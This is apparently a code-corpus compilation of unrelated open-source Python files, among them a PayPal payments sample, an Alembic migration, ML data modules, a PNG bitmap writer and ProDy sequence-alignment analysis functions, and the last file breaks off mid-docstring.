<filename>samples/payment/all.py # GetPaymentList Sample # This sample code demonstrate how you can # retrieve a list of all Payment resources # you've created using the Payments API. # Note various query parameters that you can # use to filter, and paginate through the # payments list. # API used: GET /v1/payments/payments from paypalrestsdk import Payment import logging logging.basicConfig(level=logging.INFO) # Retrieve # Retrieve the PaymentHistory by calling the # `all` method # on the Payment class # Refer the API documentation # for valid values for keys # Supported paramters are :count, :next_id payment_history = Payment.all({"count": 2}) # List Payments print("List Payment:") for payment in payment_history.payments: print(" -> Payment[%s]" % (payment.id))
migrations/versions/2e9d99288cd_.py
IsmaelJS/test-github-actions
1,420
12686651
<gh_stars>1000+ """empty message Revision ID: <KEY> Revises: 36954739c63 Create Date: 2015-11-23 21:16:54.103342 """ # revision identifiers, used by Alembic. revision = '<KEY>' down_revision = '3<PASSWORD>4<PASSWORD>' from alembic import op import sqlalchemy as sa def upgrade(): ### commands auto generated by Alembic - please adjust! ### with op.batch_alter_table('user') as batch_op: batch_op.alter_column('created', existing_type=sa.DATETIME(), nullable=False) batch_op.alter_column('updated', existing_type=sa.DATETIME(), nullable=False) ### end Alembic commands ### def downgrade(): ### commands auto generated by Alembic - please adjust! ### with op.batch_alter_table('user') as batch_op: batch_op.alter_column('updated', existing_type=sa.DATETIME(), nullable=True) batch_op.alter_column('created', existing_type=sa.DATETIME(), nullable=True) ### end Alembic commands ###
meter/datamodules/trash/nlvr2_datamodule.py
shinying/METER
135
12686654
<reponame>shinying/METER from ..datasets import NLVR2Dataset from .datamodule_base import BaseDataModule class NLVR2DataModule(BaseDataModule): def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs) @property def dataset_cls(self): return NLVR2Dataset @property def dataset_name(self): return "nlvr2"
telemetry/third_party/web-page-replay/rules/rule.py
ravitejavalluri/catapult
226
12686688
<reponame>ravitejavalluri/catapult #!/usr/bin/env python # Copyright 2015 Google Inc. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. class Rule(object): """An optional base class for rule implementations. The rule_parser looks for the 'IsType' and 'ApplyRule' methods by name, so rules are not strictly required to extend this class. """ def IsType(self, rule_type_name): """Returns True if the name matches this rule.""" raise NotImplementedError def ApplyRule(self, return_value, request, response): """Invokes this rule with the given args. Args: return_value: the prior rule's return_value (if any). request: the httparchive ArchivedHttpRequest. response: the httparchive ArchivedHttpResponse, which may be None. Returns: A (should_stop, return_value) tuple. Typically the request and response are treated as immutable, so it's the caller's job to apply the return_value (e.g., set response fields). """ raise NotImplementedError
src/garage/envs/mujoco/half_cheetah_env_meta_base.py
blacksph3re/garage
1,500
12686690
"""Base class of HalfCheetah meta-environments.""" from gym.envs.mujoco import HalfCheetahEnv as HalfCheetahEnv_ import numpy as np from garage import EnvSpec class HalfCheetahEnvMetaBase(HalfCheetahEnv_): """Base class of HalfCheetah meta-environments. Code is adapted from https://github.com/tristandeleu/pytorch-maml-rl/blob/493e677e724aa67a531250b0e215c8dbc9a7364a/maml_rl/envs/mujoco/half_cheetah.py Which was in turn adapted from https://github.com/cbfinn/maml_rl/blob/9c8e2ebd741cb0c7b8bf2d040c4caeeb8e06cc95/rllab/envs/mujoco/half_cheetah_env_rand.py Args: task (dict): Subclass specific task information. """ def __init__(self, task): self._task = task super().__init__() self.spec = EnvSpec(action_space=self.action_space, observation_space=self.observation_space) def _get_obs(self): """Get a low-dimensional observation of the state. Returns: np.ndarray: Contains the flattened angle quaternion, angular velocity quaternion, and cartesian position. """ return np.concatenate([ self.sim.data.qpos.flat[1:], self.sim.data.qvel.flat, self.get_body_com('torso').flat, ]).astype(np.float32).flatten() def viewer_setup(self): """Start the viewer.""" camera_id = self.model.camera_name2id('track') self.viewer.cam.type = 2 self.viewer.cam.fixedcamid = camera_id self.viewer.cam.distance = self.model.stat.extent * 0.35 # Hide the overlay # This code was inheritted, so we'll ignore this access violation for # now. # pylint: disable=protected-access self.viewer._hide_overlay = True def __getstate__(self): """See `Object.__getstate__. Returns: dict: The instance’s dictionary to be pickled. """ return dict(task=self._task) def __setstate__(self, state): """See `Object.__setstate__. Args: state (dict): Unpickled state of this object. """ self.__init__(task=state['task'])
metadrive/component/road_network/edge_road_network.py
liuzuxin/metadrive
125
12686692
from metadrive.component.road_network.base_road_network import BaseRoadNetwork, LaneIndex import gc import copy import logging from typing import List, Tuple, Dict import numpy as np from metadrive.component.lane.abs_lane import AbstractLane from metadrive.component.road_network.road import Road from metadrive.component.road_network.base_road_network import BaseRoadNetwork from metadrive.constants import Decoration from metadrive.utils.math_utils import get_boxes_bounding_box from metadrive.utils.scene_utils import get_lanes_bounding_box from collections import namedtuple lane_info = namedtuple("neighbor_lanes", "lane entry_lanes exit_lanes left_lanes right_lanes") class EdgeRoadNetwork(BaseRoadNetwork): """ Compared to NodeRoadNetwork representing the relation of lanes in a node-based graph, EdgeRoadNetwork stores the relationship in edge-based graph, which is more common in real map representation """ def __init__(self): super(EdgeRoadNetwork, self).__init__() self.graph = {} def add_lane(self, lane) -> None: self.graph[lane.index] = lane_info( lane=lane, entry_lanes=lane.entry_lanes, exit_lanes=lane.exit_lanes, left_lanes=lane.left_lanes, right_lanes=lane.right_lanes ) def get_lane(self, index: LaneIndex): return self.graph[index].lane def __isub__(self, other): for id, lane_info in other.graph.items(): self.graph.pop(id) return self def add(self, other, no_intersect=True): for id, lane_info in other.graph.items(): if no_intersect: assert id not in self.graph.keys(), "Intersect: {} exists in two network".format(id) self.graph[id] = other.graph[id] return self def _get_bounding_box(self): """ By using this bounding box, the edge length of x, y direction and the center of this road network can be easily calculated. :return: minimum x value, maximum x value, minimum y value, maximum y value """ lanes = [] for id, lane_info, in self.graph.items(): lanes.append(lane_info.lane) res_x_max, res_x_min, res_y_max, res_y_min = get_boxes_bounding_box([get_lanes_bounding_box(lanes)]) return res_x_min, res_x_max, res_y_min, res_y_max def shortest_path(self, start: str, goal: str): return next(self.bfs_paths(start, goal), []) def bfs_paths(self, start: str, goal: str) -> List[List[str]]: """ Breadth-first search of all routes from start to goal. :param start: starting node :param goal: goal node :return: list of paths from start to goal. """ queue = [(start, [start])] while queue: (node, path) = queue.pop(0) if node not in self.graph: yield [] for _next in set(self.graph[node].exit_lanes) - set(path): if _next == goal: yield path + [_next] elif _next in self.graph: queue.append((_next, path + [_next])) def get_peer_lanes_from_index(self, lane_index): info: lane_info = self.graph[lane_index] ret = [self.graph[lane_index].lane] for left_n in info.left_lanes: ret.append(self.graph[left_n["id"]].lane) for right_n in info.right_lanes: ret.append(self.graph[right_n["id"]].lane) return ret def destroy(self): super(EdgeRoadNetwork, self).destroy() for k, v in self.graph.items(): v.lane.destroy() self.graph[k]: lane_info = None self.graph = None def __del__(self): logging.debug("{} is released".format(self.__class__.__name__))
ml3d/torch/modules/losses/semseg_loss.py
krshrimali/Open3D-ML
346
12686699
import torch import torch.nn as nn from ....datasets.utils import DataProcessing def filter_valid_label(scores, labels, num_classes, ignored_label_inds, device): """Loss functions for semantic segmentation.""" valid_scores = scores.reshape(-1, num_classes) valid_labels = labels.reshape(-1).to(device) ignored_bool = torch.zeros_like(valid_labels, dtype=torch.bool) for ign_label in ignored_label_inds: ignored_bool = torch.logical_or(ignored_bool, torch.eq(valid_labels, ign_label)) valid_idx = torch.where(torch.logical_not(ignored_bool))[0].to(device) valid_scores = torch.gather(valid_scores, 0, valid_idx.unsqueeze(-1).expand(-1, num_classes)) valid_labels = torch.gather(valid_labels, 0, valid_idx) # Reduce label values in the range of logit shape reducing_list = torch.arange(0, num_classes, dtype=torch.int64) inserted_value = torch.zeros([1], dtype=torch.int64) for ign_label in ignored_label_inds: if ign_label >= 0: reducing_list = torch.cat([ reducing_list[:ign_label], inserted_value, reducing_list[ign_label:] ], 0) valid_labels = torch.gather(reducing_list.to(device), 0, valid_labels.long()) return valid_scores, valid_labels class SemSegLoss(object): """Loss functions for semantic segmentation.""" def __init__(self, pipeline, model, dataset, device): super(SemSegLoss, self).__init__() # weighted_CrossEntropyLoss if 'class_weights' in dataset.cfg.keys() and len( dataset.cfg.class_weights) != 0: class_wt = DataProcessing.get_class_weights( dataset.cfg.class_weights) weights = torch.tensor(class_wt, dtype=torch.float, device=device) self.weighted_CrossEntropyLoss = nn.CrossEntropyLoss(weight=weights) else: self.weighted_CrossEntropyLoss = nn.CrossEntropyLoss()
venv/Lib/site-packages/statsmodels/iolib/stata_summary_examples.py
EkremBayar/bayar
6,931
12686708
""". regress totemp gnpdefl gnp unemp armed pop year Source | SS df MS Number of obs = 16 -------------+------------------------------ F( 6, 9) = 330.29 Model | 184172402 6 30695400.3 Prob > F = 0.0000 Residual | 836424.129 9 92936.0144 R-squared = 0.9955 -------------+------------------------------ Adj R-squared = 0.9925 Total | 185008826 15 12333921.7 Root MSE = 304.85 ------------------------------------------------------------------------------ totemp | Coef. Std. Err. t P>|t| [95% Conf. Interval] -------------+---------------------------------------------------------------- gnpdefl | 15.06167 84.91486 0.18 0.863 -177.0291 207.1524 gnp | -.0358191 .033491 -1.07 0.313 -.111581 .0399428 unemp | -2.020229 .4883995 -4.14 0.003 -3.125065 -.9153928 armed | -1.033227 .2142741 -4.82 0.001 -1.517948 -.5485049 pop | -.0511045 .2260731 -0.23 0.826 -.5625173 .4603083 year | 1829.151 455.4785 4.02 0.003 798.7873 2859.515 _cons | -3482258 890420.3 -3.91 0.004 -5496529 -1467987 ------------------------------------------------------------------------------ """ #From Stata using Longley dataset as in the test and example for GLM """ . glm totemp gnpdefl gnp unemp armed pop year Iteration 0: log likelihood = -109.61744 Generalized linear models No. of obs = 16 Optimization : ML Residual df = 9 Scale parameter = 92936.01 Deviance = 836424.1293 (1/df) Deviance = 92936.01 Pearson = 836424.1293 (1/df) Pearson = 92936.01 Variance function: V(u) = 1 [Gaussian] Link function : g(u) = u [Identity] AIC = 14.57718 Log likelihood = -109.6174355 BIC = 836399.2 ------------------------------------------------------------------------------ | OIM totemp | Coef. Std. Err. z P>|z| [95% Conf. Interval] -------------+---------------------------------------------------------------- gnpdefl | 15.06167 84.91486 0.18 0.859 -151.3684 181.4917 gnp | -.0358191 .033491 -1.07 0.285 -.1014603 .029822 unemp | -2.020229 .4883995 -4.14 0.000 -2.977475 -1.062984 armed | -1.033227 .2142741 -4.82 0.000 -1.453196 -.6132571 pop | -.0511045 .2260731 -0.23 0.821 -.4941996 .3919906 year | 1829.151 455.4785 4.02 0.000 936.4298 2721.873 _cons | -3482258 890420.3 -3.91 0.000 -5227450 -1737066 ------------------------------------------------------------------------------ """ #RLM Example """ . rreg stackloss airflow watertemp acidconc Huber iteration 1: maximum difference in weights = .48402478 Huber iteration 2: maximum difference in weights = .07083248 Huber iteration 3: maximum difference in weights = .03630349 Biweight iteration 4: maximum difference in weights = .2114744 Biweight iteration 5: maximum difference in weights = .04709559 Biweight iteration 6: maximum difference in weights = .01648123 Biweight iteration 7: maximum difference in weights = .01050023 Biweight iteration 8: maximum difference in weights = .0027233 Robust regression Number of obs = 21 F( 3, 17) = 74.15 Prob > F = 0.0000 ------------------------------------------------------------------------------ stackloss | Coef. Std. Err. t P>|t| [95% Conf. Interval] -------------+---------------------------------------------------------------- airflow | .8526511 .1223835 6.97 0.000 .5944446 1.110858 watertemp | .8733594 .3339811 2.61 0.018 .1687209 1.577998 acidconc | -.1224349 .1418364 -0.86 0.400 -.4216836 .1768139 _cons | -41.6703 10.79559 -3.86 0.001 -64.447 -18.89361 ------------------------------------------------------------------------------ """
test/integration/samples_in/simple.py
Inveracity/flynt
487
12686746
var = 5 a = "my string {}".format(var)
depixel/io_png.py
sknebel/depixel
128
12686749
<reponame>sknebel/depixel import png from depixel.io_data import PixelDataWriter class Bitmap(object): mode = 'RGB' bgcolour = (127, 127, 127) def __init__(self, size, bgcolour=None, mode=None): if bgcolour is not None: self.bgcolour = bgcolour if mode is not None: self.mode = mode self.size = size self.pixels = [] for _ in range(self.size[1]): self.pixels.append([bgcolour] * self.size[0]) def set_pixel(self, x, y, value): self.pixels[y][x] = value def pixel(self, x, y): return self.pixels[y][x] def set_data(self, data): assert len(data) == self.size[1] new_pixels = [] for row in data: assert len(row) == self.size[0] new_pixels.append(row[:]) self.pixels = new_pixels def set_block(self, x, y, data): assert 0 <= x <= (self.size[0] - len(data[0])) assert 0 <= y <= (self.size[1] - len(data)) for dy, row in enumerate(data): for dx, value in enumerate(row): self.set_pixel(x + dx, y + dy, value) def flat_pixels(self): flat_pixels = [] for row in self.pixels: frow = [] for value in row: frow.extend(value) flat_pixels.append(frow) return flat_pixels def write_png(self, filename): png.from_array(self.flat_pixels(), mode=self.mode).save(filename) def draw_line(self, p0, p1, colour): """Bresenham's line algorithm.""" x0, y0 = p0 x1, y1 = p1 dx = abs(x0 - x1) dy = abs(y0 - y1) sx = 1 if x0 < x1 else -1 sy = 1 if y0 < y1 else -1 err = dx - dy while (x0, y0) != (x1, y1): self.set_pixel(x0, y0, colour) e2 = 2 * err if e2 > -dy: err -= dy x0 += + sx if e2 < dx: err += dx y0 += sy self.set_pixel(x1, y1, colour) def fill(self, point, colour): old_colour = self.pixels[point[1]][point[0]] if old_colour == colour: return self.fill_scan(point, old_colour, colour) def fill_pix(self, point, old_colour, colour): """ Pixel flood-fill. Reliable, but slow. """ to_fill = [point] while to_fill: x, y = to_fill.pop() self.set_pixel(x, y, colour) for nx, ny in [(x - 1, y), (x + 1, y), (x, y - 1), (x, y + 1)]: if 0 <= nx < self.size[0] and 0 <= ny < self.size[1]: if self.pixels[ny][nx] == old_colour: to_fill.append((nx, ny)) def fill_scan(self, point, old_colour, colour): """ Scanline flood-fill. Fast, but I'm not entirely sure what it's doing. """ to_fill = [point] while to_fill: x, y = to_fill.pop() while y > 0 and self.pixel(x, y - 1) == old_colour: y -= 1 lspan = False rspan = False while y < self.size[1] and self.pixel(x, y) == old_colour: self.set_pixel(x, y, colour) if not lspan and x > 0 and self.pixel(x - 1, y) == old_colour: to_fill.append((x - 1, y)) lspan = True elif lspan and x > 0 and self.pixel(x - 1, y) == old_colour: lspan = False if (not rspan and x < self.size[0] - 1 and self.pixel(x + 1, y) == old_colour): to_fill.append((x + 1, y)) rspan = True elif (rspan and x < self.size[0] - 1 and self.pixel(x + 1, y) == old_colour): rspan = False y += 1 class PixelDataPngWriter(PixelDataWriter): FILE_EXT = 'png' def translate_pixel(self, pixel): if not isinstance(pixel, (list, tuple)): # Assume monochrome values normalised to [0, 1]. return (int(255 * pixel),) * 3 return pixel def make_drawing(self, drawing_type, _filename): if drawing_type == 'pixels': return Bitmap(self.pixel_data.size) return Bitmap((self.pixel_data.size_x * self.PIXEL_SCALE + 1, self.pixel_data.size_y * self.PIXEL_SCALE + 1), bgcolour=(127, 127, 127)) def save_drawing(self, drawing, filename): drawing.write_png(filename) def draw_pixel(self, drawing, pt, colour): drawing.set_pixel(pt[0], pt[1], self.translate_pixel(colour)) def draw_line(self, drawing, pt0, pt1, colour): drawing.draw_line(pt0, pt1, self.translate_pixel(colour)) def draw_polygon(self, drawing, path, colour, fill): pt0 = path[-1] for pt1 in path: self.draw_line(drawing, pt0, pt1, colour) pt0 = pt1 middle = (sum([p[0] for p in path]) / len(path), sum([p[1] for p in path]) / len(path)) drawing.fill(middle, fill) def draw_path_shape(self, drawing, paths, colour, fill): for path in paths: pt0 = path[-1] for pt1 in path: self.draw_line(drawing, pt0, pt1, colour) pt0 = pt1 drawing.fill(self.find_point_within(paths, fill), fill) def find_point_within(self, paths, colour): for node, attrs in self.pixel_data.pixel_graph.nodes_iter(data=True): if colour == attrs['value']: pt = self.scale_pt(node, (0.5, 0.5)) if self.is_inside(pt, paths): return pt def is_inside(self, pt, paths): if not self._is_inside(pt, paths[0]): # Must be inside the "outside" path. return False for path in paths[1:]: if self._is_inside(pt, path): # Must be outside the "inside" paths. return False return True def _is_inside(self, pt, path): inside = False x, y = pt x0, y0 = path[-1] for x1, y1 in path: if (y0 <= y < y1 or y1 <= y < y0) and (x0 <= x or x1 <= x): # This crosses our ray. if (x1 + float(y - y1) / (y0 - y1) * (x0 - x1)) < x: inside = not inside x0, y0 = x1, y1 return inside def draw_shapes(self, drawing, element=None): for shape in self.pixel_data.shapes: paths = [[self.scale_pt(p) for p in path] for path in shape['paths']] self.draw_path_shape( drawing, paths, self.GRID_COLOUR, shape['value']) def read_png(filename): _w, _h, pixels, _meta = png.Reader(filename=filename).asRGB8() data = [] for row in pixels: d_row = [] while row: d_row.append((row.pop(0), row.pop(0), row.pop(0))) data.append(d_row) return data
prody/sequence/analysis.py
kaynakb/ProDy
210
12686770
<reponame>kaynakb/ProDy # -*- coding: utf-8 -*- """This module defines MSA analysis functions.""" __author__ = '<NAME>, <NAME>, <NAME>' from numbers import Integral import os from numpy import dtype, zeros, empty, ones, where, ceil, shape, eye from numpy import indices, tril_indices, array, ndarray, isscalar, unique from prody import LOGGER from prody.utilities import which, MATCH_SCORE, MISMATCH_SCORE from prody.utilities import GAP_PENALTY, GAP_EXT_PENALTY, ALIGNMENT_METHOD from prody.sequence.msa import MSA, refineMSA from prody.sequence.msafile import parseMSA, writeMSA from prody.sequence.sequence import Sequence from prody.atomic import Atomic from prody.measure import calcDistance from Bio import pairwise2 import sys __all__ = ['calcShannonEntropy', 'buildMutinfoMatrix', 'calcMSAOccupancy', 'applyMutinfoCorr', 'applyMutinfoNorm', 'calcRankorder', 'filterRankedPairs', 'buildSeqidMatrix', 'uniqueSequences', 'buildOMESMatrix', 'buildSCAMatrix', 'buildDirectInfoMatrix', 'calcMeff', 'buildPCMatrix', 'buildMSA', 'showAlignment', 'alignTwoSequencesWithBiopython', 'alignSequenceToMSA', 'calcPercentIdentities', 'alignSequencesByChain', 'trimAtomsUsingMSA'] doc_turbo = """ By default, *turbo* mode, which uses memory as large as the MSA array itself but runs four to five times faster, will be used. If memory allocation fails, the implementation will fall back to slower and memory efficient mode.""" def calcPercentIdentities(msa): percent_ids = [] aas = ['A','C','D','E','F','G','H','I','J','K','L', \ 'M','N','P','Q','R','S','T','V','W','Y','-'] for i in range(len(msa)): col_list = list(msa.getArray()[:,i]) max_count = 0 for aa in aas: if col_list.count(aa) > max_count: max_count = col_list.count(aa) percent_ids.append(float(max_count)/float(len(col_list))*100) return percent_ids def getMSA(msa): """Returns MSA character array.""" try: msa = msa._getArray() except AttributeError: pass try: dtype_, ndim, shape = msa.dtype, msa.ndim, msa.shape except AttributeError: raise TypeError('msa must be an MSA instance or a 2D character array') if dtype_ != dtype('|S1') or ndim != 2: raise TypeError('msa must be an MSA instance or a 2D character array') return msa def calcShannonEntropy(msa, ambiguity=True, omitgaps=True, **kwargs): """Returns Shannon entropy array calculated for *msa*, which may be an :class:`.MSA` instance or a 2D Numpy character array. Implementation is case insensitive and handles ambiguous amino acids as follows: * **B** (Asx) count is allocated to *D* (Asp) and *N* (Asn) * **Z** (Glx) count is allocated to *E* (Glu) and *Q* (Gln) * **J** (Xle) count is allocated to *I* (Ile) and *L* (Leu) * **X** (Xaa) count is allocated to the twenty standard amino acids Selenocysteine (**U**, Sec) and pyrrolysine (**O**, Pyl) are considered as distinct amino acids. When *ambiguity* is set **False**, all alphabet characters as considered as distinct types. All non-alphabet characters are considered as gaps, and they are handled in two ways: * non-existent, the probability of observing amino acids in a given column is adjusted, by default * as a distinct character with its own probability, when *omitgaps* is **False**""" msa = getMSA(msa) length = msa.shape[1] entropy = empty(length, float) from .msatools import msaentropy return msaentropy(msa, entropy, ambiguity=bool(ambiguity), omitgaps=bool(omitgaps)) def buildMutinfoMatrix(msa, ambiguity=True, turbo=True, **kwargs): """Returns mutual information matrix calculated for *msa*, which may be an :class:`.MSA` instance or a 2D Numpy character array. Implementation is case insensitive and handles ambiguous amino acids as follows: * **B** (Asx) count is allocated to *D* (Asp) and *N* (Asn) * **Z** (Glx) count is allocated to *E* (Glu) and *Q* (Gln) * **J** (Xle) count is allocated to *I* (Ile) and *L* (Leu) * **X** (Xaa) count is allocated to the twenty standard amino acids * Joint probability of observing a pair of ambiguous amino acids is allocated to all potential combinations, e.g. probability of **XX** is allocated to 400 combinations of standard amino acids, similarly probability of **XB** is allocated to 40 combinations of *D* and *N* with the standard amino acids. Selenocysteine (**U**, Sec) and pyrrolysine (**O**, Pyl) are considered as distinct amino acids. When *ambiguity* is set **False**, all alphabet characters as considered as distinct types. All non-alphabet characters are considered as gaps. Mutual information matrix can be normalized or corrected using :func:`applyMINormalization` and :func:`applyMICorrection` methods, respectively. Normalization by joint entropy can performed using this function with *norm* option set **True**.""" msa = getMSA(msa) from .msatools import msamutinfo LOGGER.timeit('_mutinfo') length = msa.shape[1] mutinfo = empty((length, length), float) mutinfo = msamutinfo(msa, mutinfo, ambiguity=bool(ambiguity), turbo=bool(turbo), norm=bool(kwargs.get('norm', False)), debug=bool(kwargs.get('debug', False))) LOGGER.report('Mutual information matrix was calculated in %.2fs.', '_mutinfo') return mutinfo buildMutinfoMatrix.__doc__ += doc_turbo def calcMSAOccupancy(msa, occ='res', count=False): """Returns occupancy array calculated for residue positions (default, ``'res'`` or ``'col'`` for *occ*) or sequences (``'seq'`` or ``'row'`` for *occ*) of *msa*, which may be an :class:`.MSA` instance or a 2D NumPy character array. By default, occupancy [0-1] will be calculated. If *count* is **True**, count of non-gap characters will be returned. Implementation is case insensitive.""" from .msatools import msaocc msa = getMSA(msa) try: dim = occ.startswith('res') or occ.startswith('col') except AttributeError: raise TypeError('occ must be a string') occ = zeros(msa.shape[int(dim)], float) return msaocc(msa, occ, dim, count=bool(count)) def applyMutinfoNorm(mutinfo, entropy, norm='sument'): """Apply one of the normalizations discussed in [MLC05]_ to *mutinfo* matrix. *norm* can be one of the following: * ``'sument'``: :math:`H(X) + H(Y)`, sum of entropy of columns * ``'minent'``: :math:`min\{H(X), H(Y)\}`, minimum entropy * ``'maxent'``: :math:`max\{H(X), H(Y)\}`, maximum entropy * ``'mincon'``: :math:`min\{H(X|Y), H(Y|X)\}`, minimum conditional entropy * ``'maxcon'``: :math:`max\{H(X|Y), H(Y|X)\}`, maximum conditional entropy where :math:`H(X)` is the entropy of a column, and :math:`H(X|Y) = H(X) - MI(X, Y)`. Normalization with joint entropy, i.e. :math:`H(X, Y)`, can be done using :func:`.buildMutinfoMatrix` *norm* argument. .. [MLC05] <NAME>, <NAME>, <NAME>, <NAME>. Using information theory to search for co-evolving residues in proteins. *Bioinformatics* **2005** 21(22):4116-4124.""" try: ndim, shape = mutinfo.ndim, mutinfo.shape except AttributeError: raise TypeError('mutinfo must be a 2D square array') if ndim != 2 or shape[0] != shape[1]: raise ValueError('mutinfo must be a 2D square array') try: ndim, shapent = entropy.ndim, entropy.shape except AttributeError: raise TypeError('entropy must be a numpy array') if ndim != 1: raise ValueError('entropy must be a 1D array') if shapent[0] != shape[0]: raise ValueError('shape of mutinfo and entropy does not match') try: sw = norm.startswith except AttributeError: raise TypeError('norm must be a string') if sw('sument'): norm = lambda i_val, j_val, val: i_val + j_val elif sw('minent'): norm = lambda i_val, j_val, val: min(i_val, j_val) elif sw('maxent'): norm = lambda i_val, j_val, val: max(i_val, j_val) elif sw('mincon'): norm = lambda i_val, j_val, val: min(i_val - val, j_val - val) elif sw('maxcon'): norm = lambda i_val, j_val, val: max(i_val - val, j_val - val) elif sw('joint'): raise ValueError('for joint entropy normalization, use ' 'buildMutinfoMatrix function') else: raise ValueError('norm={0} is not a valid normalization type' .format(norm)) mi = mutinfo.copy() for i, i_val in enumerate(entropy): for j, j_val in enumerate(entropy): val = mi[i, j] div = norm(i_val, j_val, val) if div == 0: mi[i, j] = 0 else: mi[i, j] /= div return mi def applyMutinfoCorr(mutinfo, corr='prod'): """Returns a copy of *mutinfo* array after average product correction (default) or average sum correction is applied. See [DSD08]_ for details. .. [DSD08] <NAME>, <NAME>, <NAME>. Mutual information without the influence of phylogeny or entropy dramatically improves residue contact prediction. *Bioinformatics* **2008** 24(3):333-340.""" try: ndim, shape = mutinfo.ndim, mutinfo.shape except AttributeError: raise TypeError('mutinfo must be a 2D square array') if ndim != 2 or shape[0] != shape[1]: raise ValueError('mutinfo must be a 2D square array') try: sw = corr.startswith except AttributeError: raise TypeError('correction must be a string') avg_mipos = mutinfo.sum(1) / (shape[0] - 1) avg_mi = avg_mipos.mean() mi = mutinfo.copy() if sw('prod') or sw('apc'): for i, i_avg in enumerate(avg_mipos): for j, j_avg in enumerate(avg_mipos): mi[i, j] -= (i_avg * j_avg) / avg_mi elif sw('sum') or sw('asc'): for i, i_avg in enumerate(avg_mipos): for j, j_avg in enumerate(avg_mipos): mi[i, j] -= i_avg + j_avg - avg_mi else: raise ValueError('correction must be prod or sum, not ' + corr) return mi def filterRankedPairs(pdb, indices, msa_indices, rank_row, rank_col, zscore_sort, \ num_of_pairs=20, seqDistance=5, resi_range=None, \ pdbDistance=8, chain1='A', chain2='A'): ''' indices and msa_indices are lists output from alignSequenceToMSA rank_row, rank_col and zscore_sort are the outputs from calcRankorder :arg num_of_pairs: The number of pairs to be output, if no value is given then all pairs are output. Default is 20 :type num_of_pairs: int :arg seqDistance: Remove pairs that are closer than this in the reference sequence Default is 5 :type seqDistance: int :arg pdbDistance: Remove pairs with Calpha atoms further apart than this in the PDB Default is 8 :type pdbDistance: int :arg chain1: The chain used for the residue specified by rank_row when measuring distances :type chain1: str :arg chain2: The chain used for the residue specified by rank_col when measuring distances :type chain2: str ''' if isscalar(indices): raise TypeError('Please provide a valid indices list') if isscalar(msa_indices): raise TypeError('Please provide valid msa_indices, which should be a list') if isscalar(rank_row): raise TypeError('Please provide ranked row from calcRankorder') if isscalar(rank_col): raise ValueError('Please provide ranked col from calcRankorder') if isscalar(zscore_sort): raise ValueError('Please provide sorted Z scores from calcRankorder') if num_of_pairs is None: num_of_pairs = len(rank_row) pairList = [] i = -1 j = 0 while j < num_of_pairs: i += 1 row_idx = indices[where(msa_indices == rank_row[i])[0][0]] col_idx = indices[where(msa_indices == rank_col[i])[0][0]] if not isinstance(row_idx, Integral) or not isinstance(col_idx, Integral): continue if row_idx - col_idx < seqDistance: continue distance = calcDistance(pdb.select('chain %s and resid %s' % (chain1, \ row_idx)).copy(), \ pdb.select('chain %s and resid %s' % (chain2, \ row_idx)).copy()) if distance > pdbDistance: continue if resi_range is not None: if not row_idx in resi_range and not col_idx in resi_range: continue pairList.append('%3d:\t%3d\t%3d\t%5.1f\t%5.1f\n'%(i, row_idx, col_idx, zscore_sort[i], distance)) j += 1 return pairList def buildSeqidMatrix(msa, turbo=True): """Returns sequence identity matrix for *msa*.""" msa = getMSA(msa) LOGGER.timeit('_seqid') from .seqtools import msaeye dim = msa.shape[0] seqid = msaeye(msa, ones((dim, dim), float), turbo=bool(turbo)) LOGGER.report('Sequence identity matrix was calculated in %.2fs.', '_seqid') return seqid buildSeqidMatrix.__doc__ += doc_turbo def uniqueSequences(msa, seqid=0.98, turbo=True): """Returns a boolean array marking unique sequences in *msa*. A sequence sharing sequence identity of *seqid* or more with another sequence coming before itself in *msa* will have a **True** value in the array.""" msa = getMSA(msa) from .seqtools import msaeye if not (0 < seqid <= 1): raise ValueError('seqid must satisfy 0 < seqid <= 1') return msaeye(msa, zeros(msa.shape[0], bool), unique=seqid, turbo=bool(turbo)) uniqueSequences.__doc__ += doc_turbo def calcRankorder(matrix, zscore=False, **kwargs): """Returns indices of elements and corresponding values sorted in descending order, if *descend* is **True** (default). Can apply a zscore normalization; by default along *axis* - 0 such that each column has ``mean=0`` and ``std=1``. If *zcore* analysis is used, return value contains the zscores. If matrix is symmetric only lower triangle indices will be returned, with diagonal elements if *diag* is **True** (default).""" try: ndim, shape = matrix.ndim, matrix.shape except AttributeError: raise TypeError('matrix must be a 2D array') if ndim != 2: raise ValueError('matrix must be a 2D array') threshold = kwargs.get('thredhold', 0.0001) try: symm = abs((matrix.transpose() - matrix).max()) < threshold except: symm = False if zscore: axis = int(bool(kwargs.get('axis', 0))) matrix = (matrix - matrix.mean(axis)) / matrix.std(axis) LOGGER.info('Zscore normalization has been applied.') descend = kwargs.get('descend', True) if not symm: if descend: sorted_index = matrix.argsort(axis=None)[::-1] else: sorted_index = matrix.argsort(axis=None) row = indices(shape)[0].flatten()[sorted_index] column = indices(shape)[1].flatten()[sorted_index] else: LOGGER.info('Matrix is symmetric, only lower triangle indices ' 'will be returned.') if kwargs.get('diag', True): k = 0 else: k = -1 ind_row, ind_column = tril_indices(shape[0], k=k) matrix_lt = matrix[ind_row, ind_column] if descend: sorted_index = matrix_lt.argsort(axis=None)[::-1] else: sorted_index = matrix_lt.argsort(axis=None) row = ind_row[sorted_index] column = ind_column[sorted_index] return (row, column, matrix[row, column]) def buildOMESMatrix(msa, ambiguity=True, turbo=True, **kwargs): """Returns OMES (Observed Minus Expected Squared) covariance matrix calculated for *msa*, which may be an :class:`.MSA` instance or a 2D NumPy character array. OMES is defined as:: (N_OBS - N_EX)^2 (f_i,j - f_i * f_j)^2 OMES_(i,j) = sum(------------------) = N * sum(-----------------------) N_EX f_i * f_j Implementation is case insensitive and handles ambiguous amino acids as follows: * **B** (Asx) count is allocated to *D* (Asp) and *N* (Asn) * **Z** (Glx) count is allocated to *E* (Glu) and *Q* (Gln) * **J** (Xle) count is allocated to *I* (Ile) and *L* (Leu) * **X** (Xaa) count is allocated to the twenty standard amino acids * Joint probability of observing a pair of ambiguous amino acids is allocated to all potential combinations, e.g. probability of **XX** is allocated to 400 combinations of standard amino acids, similarly probability of **XB** is allocated to 40 combinations of *D* and *N* with the standard amino acids. Selenocysteine (**U**, Sec) and pyrrolysine 